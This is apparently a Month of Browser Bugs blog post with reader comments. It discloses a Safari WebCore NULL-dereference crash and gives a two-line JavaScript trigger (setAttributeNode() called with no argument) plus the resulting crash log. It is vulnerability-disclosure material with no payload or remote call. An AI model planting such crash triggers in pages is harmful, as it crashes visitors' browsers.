MoBB #5: DHTML setAttributeNode()
The following bug was tested on the latest version of Safari ( 2.0.4 / 419.3) on a fully-patched Mac OS X (10.4.7 - Build 8J135) system. This bug was discovered by Dennis Cox using a modified version of the Hamachi test. This bug does not trigger using the Konqueror KHTML/KJS engine included with KDE 3.5.1, even though these products share code.
var a = document.createElement("a");
a.setAttributeNode();
Demonstration
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x0000000c
Thread 0 Crashed:
0 com.apple.WebCore DOM::NamedAttrMapImpl::setNamedItem()
1 com.apple.WebCore DOM::Element::setAttributeNodeNS()
2 com.apple.WebCore DOM::Element::setAttributeNode()
This bug will be added to the OSVDB:
Apple Safari DHTML setAttributeNode() NULL Dereference
posted by hdm @ 7:30 PM
6 comments
links to this post
6 Comments:
Testing this with Camino, Version 2006042704 (1.0.1int), Camino still runs, but clicking on links doesn't work anymore
It is fixed in the nightly.
So, how much work did the tester have to do to discover this bug? Hum, maybe they just read the change log of the nightly. Maybe the article should be titled, "A bug fix that hasn't made it into the latest release." Lame . . .
It was discovered using the original release of Hamachi (around mid-March). You can find the note about in the BUGS.txt file at the following location:
http://metasploit.com/users/hdm/tools/hamachi/BUGS.txt
Hello Hdm, all bugs are reported to vendors correct?
Close enough :-)
Post a Comment
Links to this post:
Create a Link
<< Home